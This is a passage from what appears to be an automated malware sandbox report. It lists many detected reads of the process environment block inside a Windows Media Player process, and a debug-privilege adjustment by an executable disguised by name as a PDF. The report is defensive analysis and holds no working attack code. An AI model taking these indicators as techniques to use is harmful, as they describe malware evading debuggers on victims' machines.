          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038470C0 mov eax, dword ptr fs:[00000030h]6_2_038470C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039050D9 mov eax, dword ptr fs:[00000030h]6_2_039050D9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AD0C0 mov eax, dword ptr fs:[00000030h]6_2_038AD0C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AD0C0 mov eax, dword ptr fs:[00000030h]6_2_038AD0C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B20DE mov eax, dword ptr fs:[00000030h]6_2_038B20DE
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038590DB mov eax, dword ptr fs:[00000030h]6_2_038590DB
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038550E4 mov eax, dword ptr fs:[00000030h]6_2_038550E4
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038550E4 mov ecx, dword ptr fs:[00000030h]6_2_038550E4
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0382A0E3
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038380E9 mov eax, dword ptr fs:[00000030h]6_2_038380E9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382C0F0 mov eax, dword ptr fs:[00000030h]6_2_0382C0F0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038720F0 mov ecx, dword ptr fs:[00000030h]6_2_038720F0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E016 mov eax, dword ptr fs:[00000030h]6_2_0384E016
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E016 mov eax, dword ptr fs:[00000030h]6_2_0384E016
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E016 mov eax, dword ptr fs:[00000030h]6_2_0384E016
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E016 mov eax, dword ptr fs:[00000030h]6_2_0384E016
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382A020 mov eax, dword ptr fs:[00000030h]6_2_0382A020
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382C020 mov eax, dword ptr fs:[00000030h]6_2_0382C020
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F903E mov eax, dword ptr fs:[00000030h]6_2_038F903E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F903E mov eax, dword ptr fs:[00000030h]6_2_038F903E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F903E mov eax, dword ptr fs:[00000030h]6_2_038F903E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F903E mov eax, dword ptr fs:[00000030h]6_2_038F903E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03832050 mov eax, dword ptr fs:[00000030h]6_2_03832050
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038D705E mov ebx, dword ptr fs:[00000030h]6_2_038D705E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038D705E mov eax, dword ptr fs:[00000030h]6_2_038D705E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385B052 mov eax, dword ptr fs:[00000030h]6_2_0385B052
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03905060 mov eax, dword ptr fs:[00000030h]6_2_03905060
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov ecx, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03841070 mov eax, dword ptr fs:[00000030h]6_2_03841070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385C073 mov eax, dword ptr fs:[00000030h]6_2_0385C073
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AD070 mov ecx, dword ptr fs:[00000030h]6_2_038AD070
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EF78A mov eax, dword ptr fs:[00000030h]6_2_038EF78A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B97A9 mov eax, dword ptr fs:[00000030h]6_2_038B97A9
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]6_2_038BF7AF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]6_2_038BF7AF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]6_2_038BF7AF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]6_2_038BF7AF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038BF7AF mov eax, dword ptr fs:[00000030h]6_2_038BF7AF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_039037B6 mov eax, dword ptr fs:[00000030h]6_2_039037B6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038307AF mov eax, dword ptr fs:[00000030h]6_2_038307AF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385D7B0 mov eax, dword ptr fs:[00000030h]6_2_0385D7B0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F7BA mov eax, dword ptr fs:[00000030h]6_2_0382F7BA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383C7C0 mov eax, dword ptr fs:[00000030h]6_2_0383C7C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038357C0 mov eax, dword ptr fs:[00000030h]6_2_038357C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038357C0 mov eax, dword ptr fs:[00000030h]6_2_038357C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038357C0 mov eax, dword ptr fs:[00000030h]6_2_038357C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383D7E0 mov ecx, dword ptr fs:[00000030h]6_2_0383D7E0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038527ED mov eax, dword ptr fs:[00000030h]6_2_038527ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038527ED mov eax, dword ptr fs:[00000030h]6_2_038527ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038527ED mov eax, dword ptr fs:[00000030h]6_2_038527ED
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038347FB mov eax, dword ptr fs:[00000030h]6_2_038347FB
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038347FB mov eax, dword ptr fs:[00000030h]6_2_038347FB
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03837703 mov eax, dword ptr fs:[00000030h]6_2_03837703
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03835702 mov eax, dword ptr fs:[00000030h]6_2_03835702
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03835702 mov eax, dword ptr fs:[00000030h]6_2_03835702
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386C700 mov eax, dword ptr fs:[00000030h]6_2_0386C700
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03830710 mov eax, dword ptr fs:[00000030h]6_2_03830710
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03860710 mov eax, dword ptr fs:[00000030h]6_2_03860710
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386F71F mov eax, dword ptr fs:[00000030h]6_2_0386F71F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386F71F mov eax, dword ptr fs:[00000030h]6_2_0386F71F
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EF72E mov eax, dword ptr fs:[00000030h]6_2_038EF72E
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03833720 mov eax, dword ptr fs:[00000030h]6_2_03833720
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384F720 mov eax, dword ptr fs:[00000030h]6_2_0384F720
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384F720 mov eax, dword ptr fs:[00000030h]6_2_0384F720
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384F720 mov eax, dword ptr fs:[00000030h]6_2_0384F720
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F972B mov eax, dword ptr fs:[00000030h]6_2_038F972B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386C720 mov eax, dword ptr fs:[00000030h]6_2_0386C720
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386C720 mov eax, dword ptr fs:[00000030h]6_2_0386C720
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0390B73C mov eax, dword ptr fs:[00000030h]6_2_0390B73C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0390B73C mov eax, dword ptr fs:[00000030h]6_2_0390B73C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0390B73C mov eax, dword ptr fs:[00000030h]6_2_0390B73C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0390B73C mov eax, dword ptr fs:[00000030h]6_2_0390B73C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829730 mov eax, dword ptr fs:[00000030h]6_2_03829730
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03829730 mov eax, dword ptr fs:[00000030h]6_2_03829730
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03865734 mov eax, dword ptr fs:[00000030h]6_2_03865734
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383973A mov eax, dword ptr fs:[00000030h]6_2_0383973A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383973A mov eax, dword ptr fs:[00000030h]6_2_0383973A
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386273C mov eax, dword ptr fs:[00000030h]6_2_0386273C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386273C mov ecx, dword ptr fs:[00000030h]6_2_0386273C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386273C mov eax, dword ptr fs:[00000030h]6_2_0386273C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AC730 mov eax, dword ptr fs:[00000030h]6_2_038AC730
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03843740 mov eax, dword ptr fs:[00000030h]6_2_03843740
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03843740 mov eax, dword ptr fs:[00000030h]6_2_03843740
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03843740 mov eax, dword ptr fs:[00000030h]6_2_03843740
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386674D mov esi, dword ptr fs:[00000030h]6_2_0386674D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386674D mov eax, dword ptr fs:[00000030h]6_2_0386674D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386674D mov eax, dword ptr fs:[00000030h]6_2_0386674D
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03830750 mov eax, dword ptr fs:[00000030h]6_2_03830750
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872750 mov eax, dword ptr fs:[00000030h]6_2_03872750
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872750 mov eax, dword ptr fs:[00000030h]6_2_03872750
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03903749 mov eax, dword ptr fs:[00000030h]6_2_03903749
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B4755 mov eax, dword ptr fs:[00000030h]6_2_038B4755
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B765 mov eax, dword ptr fs:[00000030h]6_2_0382B765
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B765 mov eax, dword ptr fs:[00000030h]6_2_0382B765
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B765 mov eax, dword ptr fs:[00000030h]6_2_0382B765
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382B765 mov eax, dword ptr fs:[00000030h]6_2_0382B765
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03838770 mov eax, dword ptr fs:[00000030h]6_2_03838770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03840770 mov eax, dword ptr fs:[00000030h]6_2_03840770
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B368C mov eax, dword ptr fs:[00000030h]6_2_038B368C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B368C mov eax, dword ptr fs:[00000030h]6_2_038B368C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B368C mov eax, dword ptr fs:[00000030h]6_2_038B368C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B368C mov eax, dword ptr fs:[00000030h]6_2_038B368C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03834690 mov eax, dword ptr fs:[00000030h]6_2_03834690
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03834690 mov eax, dword ptr fs:[00000030h]6_2_03834690
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386C6A6 mov eax, dword ptr fs:[00000030h]6_2_0386C6A6
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382D6AA mov eax, dword ptr fs:[00000030h]6_2_0382D6AA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382D6AA mov eax, dword ptr fs:[00000030h]6_2_0382D6AA
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038276B2 mov eax, dword ptr fs:[00000030h]6_2_038276B2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038276B2 mov eax, dword ptr fs:[00000030h]6_2_038276B2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038276B2 mov eax, dword ptr fs:[00000030h]6_2_038276B2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038666B0 mov eax, dword ptr fs:[00000030h]6_2_038666B0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0386A6C7
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386A6C7 mov eax, dword ptr fs:[00000030h]6_2_0386A6C7
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]6_2_0383B6C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]6_2_0383B6C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]6_2_0383B6C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]6_2_0383B6C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]6_2_0383B6C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383B6C0 mov eax, dword ptr fs:[00000030h]6_2_0383B6C0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F16CC mov eax, dword ptr fs:[00000030h]6_2_038F16CC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F16CC mov eax, dword ptr fs:[00000030h]6_2_038F16CC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F16CC mov eax, dword ptr fs:[00000030h]6_2_038F16CC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F16CC mov eax, dword ptr fs:[00000030h]6_2_038F16CC
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038EF6C7 mov eax, dword ptr fs:[00000030h]6_2_038EF6C7
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038616CF mov eax, dword ptr fs:[00000030h]6_2_038616CF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]6_2_038C36EE
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]6_2_038C36EE
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]6_2_038C36EE
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]6_2_038C36EE
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]6_2_038C36EE
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038C36EE mov eax, dword ptr fs:[00000030h]6_2_038C36EE
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385D6E0 mov eax, dword ptr fs:[00000030h]6_2_0385D6E0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0385D6E0 mov eax, dword ptr fs:[00000030h]6_2_0385D6E0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038636EF mov eax, dword ptr fs:[00000030h]6_2_038636EF
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE6F2 mov eax, dword ptr fs:[00000030h]6_2_038AE6F2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE6F2 mov eax, dword ptr fs:[00000030h]6_2_038AE6F2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE6F2 mov eax, dword ptr fs:[00000030h]6_2_038AE6F2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE6F2 mov eax, dword ptr fs:[00000030h]6_2_038AE6F2
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B06F1 mov eax, dword ptr fs:[00000030h]6_2_038B06F1
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038B06F1 mov eax, dword ptr fs:[00000030h]6_2_038B06F1
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038ED6F0 mov eax, dword ptr fs:[00000030h]6_2_038ED6F0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03861607 mov eax, dword ptr fs:[00000030h]6_2_03861607
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038AE609 mov eax, dword ptr fs:[00000030h]6_2_038AE609
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0386F603 mov eax, dword ptr fs:[00000030h]6_2_0386F603
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]6_2_0384260B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]6_2_0384260B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]6_2_0384260B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]6_2_0384260B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]6_2_0384260B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]6_2_0384260B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384260B mov eax, dword ptr fs:[00000030h]6_2_0384260B
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03833616 mov eax, dword ptr fs:[00000030h]6_2_03833616
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03833616 mov eax, dword ptr fs:[00000030h]6_2_03833616
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03872619 mov eax, dword ptr fs:[00000030h]6_2_03872619
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384E627 mov eax, dword ptr fs:[00000030h]6_2_0384E627
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0382F626 mov eax, dword ptr fs:[00000030h]6_2_0382F626
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03866620 mov eax, dword ptr fs:[00000030h]6_2_03866620
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03905636 mov eax, dword ptr fs:[00000030h]6_2_03905636
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_03868620 mov eax, dword ptr fs:[00000030h]6_2_03868620
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0383262C mov eax, dword ptr fs:[00000030h]6_2_0383262C
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_0384C640 mov eax, dword ptr fs:[00000030h]6_2_0384C640
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 6_2_038F866E mov eax, dword ptr fs:[00000030h]6_2_038F866E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00E948B7 GetLastError,SetLastError,GetProcessHeap,HeapFree,10_2_00E948B7
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeProcess token adjusted: DebugJump to behavior
